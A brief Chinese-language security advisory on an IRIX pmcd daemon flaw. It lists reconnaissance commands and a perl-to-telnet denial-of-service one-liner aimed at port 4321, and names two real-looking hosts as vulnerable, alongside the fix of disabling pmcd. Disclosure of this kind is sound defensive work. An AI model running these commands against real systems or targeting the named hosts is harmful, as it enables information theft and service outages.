SGI IRIX 6.5.6/6.5.4/6.5.3/6.4/6.3/6.2
描述:
Irix 6.5.x 系列缺省安装(pmcd)存在安全缺陷
详细:
Performance Copilot package是 IRIX6.5 的部件,在缺省安装下将被启动,守护进程为 pmcd ,安装在 /usr/etc 目录下。这个程序侦听 4321 端口。通常这个程序没有设置访问控制。
下面这两个网站有这个缺陷:
columbo.kent.edu
www.bmen.tulane.edu
pmcd 暴露大量系统信息,同时也存在 DOS(拒绝服务)缺陷。
使用下面的命令,可以列出所有的disk和mount point:
% pminfo -f -h sgi.victim.com filesys.mountdir
下面的命令允许列出这台主机上的所有进程,和进程的所有者等参数,类似于执行 ps -efl 命令:
% % pmem -h sgi.victim.com
下面这条命令将对目标主机执行较严重的 DOS 攻击:
% % perl -e 'print " a" x 92834244,"\n";'' | telnet sgi.victim.com 4321
这可能造成数百MB的垃圾信息。
下面的命令将告诉用户有关swap的信息:
% pminfo -f -h sgi.victim.com swap
解决方案:
禁止 pmcd 守护进程运行
